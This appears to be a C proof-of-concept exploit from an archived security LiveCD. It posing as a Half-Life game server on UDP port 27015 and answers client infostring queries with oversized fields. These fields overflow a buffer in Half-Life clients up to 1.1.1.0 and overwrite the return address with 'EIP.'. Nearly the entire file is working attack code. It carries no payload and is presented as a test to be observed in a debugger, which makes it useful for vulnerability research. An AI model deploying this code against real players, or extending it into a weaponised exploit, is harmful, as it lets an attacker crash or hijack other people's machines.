home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / games / halflife / hlbof-client.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  9.2 KB  |  429 lines
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4.  
  5. #ifdef WIN
  6.     #include <winsock.h>
  7.     #include "winerr.h"
  8.  
  9.     #define    close    closesocket
  10. #else
  11.     #include <unistd.h>
  12.     #include <sys/socket.h>
  13.     #include <sys/types.h>
  14.     #include <arpa/inet.h>
  15.     #include <netdb.h>
  16. #endif
  17.  
  18.  
  19.  
  20. #define VER        "0.1"
  21. #define PORT    27015
  22. #define BUFFSZ    2048
  23.  
  24.  
  25.  
  26. /* QUERIES */
  27. #define PING    "ping"
  28. #define INFOS    "infostring"
  29. #define INFO    "info"
  30. #define DET     "details"
  31. #define CHALL    "getchallenge"
  32. #define PLAY    "players"
  33. #define RULES    "rules"
  34. #define RCON    "challenge rcon"
  35. #define CONN    "connect"
  36.  
  37.  
  38. /* ANSWERS */
  39. #define INFOS1P    "\xff\xff\xff\xff" \
  40.         "infostringresponse\x00" \
  41.         "\\" \
  42.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  43.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  44.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  45.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  46.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  47.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  48.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  49.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  50.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  51.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  52.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  53.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  54.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  55.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  56.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  57.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  58. /* EIP */    "EIP." \
  59.         "\\0" \
  60.         "\\protocol\\46" \
  61.         "\\address\\1.2.3.4:27015" \
  62.         "\\players\\3" \
  63.         "\\proxytarget\\0" \
  64.         "\\lan\\0" \
  65.         "\\max\\16" \
  66.         "\\gamedir\\valve" \
  67.         "\\description\\Half-Life" \
  68.         "\\hostname\\Test" \
  69.         "\\map\\map" \
  70.         "\\type\\l" \
  71.         "\\password\\0" \
  72.         "\\os\\w" \
  73.         "\\secure\\0" \
  74.         "\x00"
  75.  
  76. #define INFOS1V    "\xff\xff\xff\xff" \
  77.         "infostringresponse\x00" \
  78.         "\\hostname\\" \
  79.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  80.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  81.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  82.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  83.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  84.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  85.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  86.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  87.         "aaaaaaaaaaaaaaaa" \
  88. /* EIP */    "EIP." \
  89.         "\\protocol\\46" \
  90.         "\\address\\1.2.3.4:27015" \
  91.         "\\players\\3" \
  92.         "\\proxytarget\\0" \
  93.         "\\lan\\0" \
  94.         "\\max\\16" \
  95.         "\\gamedir\\valve" \
  96.         "\\description\\Half-Life" \
  97.         "\\hostname\\Test" \
  98.         "\\map\\map" \
  99.         "\\type\\l" \
  100.         "\\password\\0" \
  101.         "\\os\\w" \
  102.         "\\secure\\0" \
  103.         "\x00"
  104.  
  105. #define PING1    "\xff\xff\xff\xff" \
  106.         "j\x00"
  107.  
  108. #define PLAY1    "\xff\xff\xff\xff" \
  109.         "D" \
  110. /* players */    "\x03" \
  111.         "\x01" "player1\0" "\x04\x00\x00\x00" "\xff\xff\xff\xff" \
  112.         "\x02" "player2\0" "\x06\x00\x00\x00" "\xff\xff\xff\xff" \
  113.         "\x03" "player3\0" "\x09\x01\x00\x00" "\xff\xff\xff\xff"
  114. //        |      |           |                  |
  115. //        |      |           |                  total time in-game
  116. //        |      |           number of frags
  117. //        |      player name
  118. //        player ID
  119.  
  120. #define RULES1    "\xff\xff\xff\xff" \
  121.         "E" \
  122. /* rules */    "\x2b\x00" \
  123.         "mp_logfile\0" "1\0" \
  124.         "deathmatch\0" "1\0" \
  125.         "coop\0" "0\0" \
  126.         "pausable\0" "0\0" \
  127.         "sv_voiceenable\0" "1\0" \
  128.         "mp_consistency\0" "1\0" \
  129.         "sv_contact\0" "contactme\0" \
  130.         "sv_proxies\0" "1\0" \
  131.         "sv_password\0" "0\0" \
  132.         "sv_aim\0" "0\0" \
  133.         "sv_gravity\0" "800\0" \
  134.         "sv_friction\0" "4\0" \
  135.         "edgefriction\0" "2\0" \
  136.         "sv_stopspeed\0" "100\0" \
  137.         "sv_maxspeed\0" "270\0" \
  138.         "mp_footsteps\0" "1\0" \
  139.         "sv_accelerate\0" "10\0" \
  140.         "sv_stepsize\0" "18\0" \
  141.         "sv_clipmode\0" "0\0" \
  142.         "sv_bounce\0" "1\0" \
  143.         "sv_airmove\0" "1\0" \
  144.         "sv_airaccelerate\0" "10\0" \
  145.         "sv_wateraccelerate\0" "10\0" \
  146.         "sv_waterfriction\0" "1\0" \
  147.         "sv_clienttrace\0" "3.5\0" \
  148.         "sv_cheats\0" "0\0" \
  149.         "sv_allowupload\0" "1\0" \
  150.         "sv_minrate\0" "0\0" \
  151.         "sv_maxrate\0" "0\0" \
  152.         "mp_teamplay\0" "0\0" \
  153.         "mp_fraglimit\0" "20.000000\0" \
  154.         "mp_timelimit\0" "20.000000\0" \
  155.         "mp_fragsleft\0" "9999\0" \
  156.         "mp_timeleft\0" "1088\0" \
  157.         "mp_friendlyfire\0" "1\0" \
  158.         "mp_falldamage\0" "1\0" \
  159.         "mp_weaponstay\0" "1\0" \
  160.         "mp_forcerespawn\0" "1\0" \
  161.         "mp_flashlight\0" "1\0" \
  162.         "mp_autocrosshair\0" "0\0" \
  163.         "decalfrequency\0" "30\0" \
  164.         "mp_teamlist\0" "hgrunt;scientist\0" \
  165.         "mp_allowmonsters\0" "0\0" \
  166.         "mp_chattime\0" "10\0"
  167. //        |           |    | |
  168. //        |           |    | NULL
  169. //        |           |    rule value
  170. //        |           NULL
  171. //        rule name
  172.  
  173. #define CHALL1    "\xff\xff\xff\xff" \
  174.         "A00000000 123456789 2\n\x00"
  175. //                   |
  176. //               challenge key
  177.  
  178. #define DET1    "\xff\xff\xff\xff" \
  179.                 "m" \
  180. /* IP&port */   "1.2.3.4:27015\0" \
  181. /* hostname */    "Test\0"\
  182. /* mapname */    "map\0"\
  183. /* gamedir */    "valve\0"\
  184. /* descr */     "Half-Life\0"\
  185. /* clients */    "\x03" \
  186. /* maxclients*/    "\x10" \
  187. /* protocol */    "\x2e" \
  188. /* type */      "l" \
  189. /* OS */        "w" \
  190. /* passwordd */    "\x00" \
  191. /* mod run */    "\x00" \
  192.             "\x00"
  193.  
  194. #define CONN1    "\xff\xff\xff\xff" \
  195.         "B" \
  196.         "4294967371 3 \"1.2.3.4:27005\"\0"
  197.  
  198.  
  199. #define BUGNUM  "" \
  200. "1 = Parameter buffer-overflow: the return address of the clients will be overwritten with \"EIP.\" (0x2e504945)\n" \
  201. "2 = Value buffer-overflow: the return address of the clients will be overwritten with \"EIP.\" (0x2e504945)\n"
  202.  
  203.  
  204.  
  205.  
  206.  
  207. void show_dump(unsigned char *buff, unsigned int buffsz);
  208. void std_err(void);
  209.  
  210.  
  211.  
  212.  
  213.  
  214. int main(int argc, char *argv[]) {
  215.     int         sd,
  216.                 err,
  217.                 plen,
  218.                 infostrlen;
  219.     u_short        port = PORT;
  220.     struct    sockaddr_in    peerc,
  221.                 peers;
  222.     u_char        buff[BUFFSZ],
  223.             *infostr;
  224.  
  225.  
  226.     fputs("\n"
  227.         "Half-Life <= 1.1.1.0 passive buffer-overflow test "VER"\n"
  228.         "by Auriemma Luigi\n"
  229.         "e-mail: aluigi@pivx.com\n"
  230.         "web:    http://www.pivx.com/luigi/\n"
  231.         "\n", stdout);
  232.  
  233.  
  234.     if(argc < 2) {
  235.         printf("\nUsage: %s <bug_num> [listening_port(%hu)]\n"
  236.             "\n\nbug_num:\n\n"
  237.             BUGNUM
  238.             "\n", argv[0], PORT);
  239.         exit(1);
  240.     }
  241.  
  242.  
  243.  
  244.     switch(argv[1][0]) {
  245.         case '1': {
  246.             infostr = INFOS1P;
  247.             infostrlen = sizeof(INFOS1P) - 1;
  248.             } break;
  249.         case '2': {
  250.             infostr = INFOS1V;
  251.             infostrlen = sizeof(INFOS1V) - 1;
  252.             } break;
  253.         default: {
  254.             fputs("\nError: You must chose the bug number:\n\n"
  255.                 BUGNUM
  256.                 "\n", stdout);
  257.             exit(1);
  258.         }
  259.     }
  260.     if(argc > 2) port = atoi(argv[2]);
  261.  
  262.  
  263. #ifdef WIN
  264.     WSADATA    wsadata;
  265.     err = WSAStartup(MAKEWORD(2,0), &wsadata);
  266.     if(err < 0) std_err();
  267. #endif
  268.  
  269.  
  270.     sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
  271.     if(sd < 0) std_err();
  272.  
  273.     peers.sin_addr.s_addr = INADDR_ANY;
  274.     peers.sin_port        = htons(port);
  275.     peers.sin_family      = AF_INET;
  276.     plen                  = sizeof(peerc);
  277.  
  278.     err = bind(sd, (struct sockaddr *)&peers, plen);
  279.     if(err < 0) std_err();
  280.  
  281.  
  282.     printf("\nListening on UDP port %u\n\n"
  283.         "NOTE: use a debugger to see the exception and the overwritten EIP\n\n",
  284.         port);
  285.  
  286.  
  287.     while(1) {
  288.         err = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peerc, &plen);
  289.         if(err < 0) std_err();
  290.         buff[err] = 0x00;
  291.  
  292.  
  293.         printf("%s:%d = ",
  294.             inet_ntoa(peerc.sin_addr),
  295.             htons(peerc.sin_port));
  296.  
  297.         /* --- */
  298.  
  299.         if(!memcmp(buff + 4, INFOS, sizeof(INFOS) - 1)) {
  300.             fputs("INFOSTRING (buffer-overflow)\n", stdout);
  301.             sendto(sd, infostr, infostrlen, 0, (struct sockaddr *)&peerc, plen);
  302.             continue;
  303.         }
  304.  
  305.         if(!memcmp(buff + 4, PING, sizeof(PING) - 1)) {
  306.             fputs("PING\n", stdout);
  307.             sendto(sd, PING1, sizeof(PING1) - 1, 0, (struct sockaddr *)&peerc, plen);
  308.             continue;
  309.         }
  310.  
  311.         if(!memcmp(buff + 4, PLAY, sizeof(PLAY) - 1)) {
  312.             fputs("PLAYERS\n", stdout);
  313.             sendto(sd, PLAY1, sizeof(PLAY1) - 1, 0, (struct sockaddr *)&peerc, plen);
  314.             continue;
  315.         }
  316.  
  317.         if(!memcmp(buff + 4, RULES, sizeof(RULES) - 1)) {
  318.             fputs("RULES\n", stdout);
  319.             sendto(sd, RULES1, sizeof(RULES1) - 1, 0, (struct sockaddr *)&peerc, plen);
  320.             continue;
  321.         }
  322.  
  323.         if(!memcmp(buff + 4, CHALL, sizeof(CHALL) - 1)) {
  324.             fputs("GETCHALLENGE\n", stdout);
  325.             sendto(sd, CHALL1, sizeof(CHALL1) - 1, 0, (struct sockaddr *)&peerc, plen);
  326.             continue;
  327.         }
  328.  
  329.         if(!memcmp(buff + 4, DET, sizeof(DET) - 1)) {
  330.             fputs("DETAILS\n", stdout);
  331.             sendto(sd, DET1, sizeof(DET1) - 1, 0, (struct sockaddr *)&peerc, plen);
  332.             continue;
  333.         }
  334.  
  335.         if(!memcmp(buff + 4, CONN, sizeof(CONN) - 1)) {
  336.             printf("CONNECT: \n%s\n", buff + 4);
  337.             sendto(sd, CONN1, sizeof(CONN1) - 1, 0, (struct sockaddr *)&peerc, plen);
  338.             continue;
  339.         }
  340.  
  341.         fputs("Unknown data:\n", stdout);
  342.         show_dump(buff, err);
  343.     }
  344.  
  345.     close(sd);
  346.     return 0;
  347. }
  348.  
  349.  
  350.  
  351.  
  352.  
  353. void show_dump(unsigned char *buff, unsigned int buffsz) {
  354.     const char    *hex = "0123456789abcdef";
  355.     unsigned char    buffout[80],
  356.             *ptrout,
  357.             *ptr;
  358.     unsigned int    num;
  359.     int        i,
  360.             j,
  361.             rest;
  362.  
  363.     num = buffsz >> 4;        /* 16 caratteri */
  364.     rest = (buffsz - (num << 4));
  365.     ptr = buff;
  366.  
  367.  
  368.     for(i = 0; i < num; i++) {
  369.         ptrout = buffout;
  370.         for(j = 0; j < 16; j++) {
  371.             *ptrout++ = hex[*ptr >> 4];
  372.             *ptrout++ = hex[*ptr & 0xf];
  373.             *ptrout++ = 0x20;
  374.             *ptr++;
  375.         }
  376.         *ptrout++ = 0x20;
  377.         *ptrout++ = 0x20;
  378.  
  379.         ptr -= 16;
  380.         for(j = 0; j < 16; j++) {
  381.             if(*ptr > 0x20) *ptrout = *ptr;
  382.                 else *ptrout = '.';
  383.             ptr++;
  384.             ptrout++;
  385.         }
  386.         *ptrout++ = 0x0a;
  387.         *ptrout = 0x00;
  388.         fputs(buffout, stdout);
  389.     }
  390.  
  391.     if(rest) {
  392.         ptrout = buffout;
  393.         for(j = 0; j < rest; j++) {
  394.             *ptrout++ = hex[*ptr >> 4];
  395.             *ptrout++ = hex[*ptr & 0xf];
  396.             *ptrout++ = 0x20;
  397.             *ptr++;
  398.         }
  399.  
  400.         j = 50 - (ptrout - buffout);
  401.         memset(ptrout, 0x20, j);
  402.         ptrout += j;
  403.  
  404.         ptr -= rest;
  405.         for(j = 0; j < rest; j++) {
  406.             if(*ptr > 0x20) *ptrout = *ptr;
  407.                 else *ptrout = '.';
  408.             ptr++;
  409.             ptrout++;
  410.         }
  411.         *ptrout++ = 0x0a;
  412.         *ptrout = 0x00;
  413.         fputs(buffout, stdout);
  414.     }
  415. }
  416.  
  417.  
  418.  
  419.  
  420.  
  421. #ifndef WIN
  422.     void std_err(void) {
  423.         perror("\nError");
  424.         exit(1);
  425.     }
  426. #endif
  427.  
  428.  
  429.